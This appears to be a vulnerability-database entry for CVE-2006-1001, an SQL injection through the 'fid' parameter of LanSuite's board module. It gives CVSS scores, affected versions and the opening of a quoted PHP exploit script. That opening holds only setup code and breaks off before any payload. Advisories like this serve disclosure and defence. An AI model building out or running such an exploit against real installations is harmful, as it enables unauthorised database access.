5
CVSSv2

CVE-2006-1001

Published: 06/03/2006 Updated: 19/10/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:P/A:N

Vulnerability Summary

SQL injection vulnerability in the board module in LanSuite LanParty Intranet System 2.0.6 and 2.1.0 beta allows remote malicious users to execute arbitrary SQL commands via the fid parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

lansuite lanparty intranet system 2.0.6

lansuite lanparty intranet system 2.1

Exploits

<? error_reporting(E_ERROR); function xss_init() { if (!extension_loaded('php_curl')) { if (!dl('curlso') and !dl('php_curlso') and !dl('php_curldll')) die ("oo error - cannot load curl extension!"); } } function xss_header() { echo "\noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo ...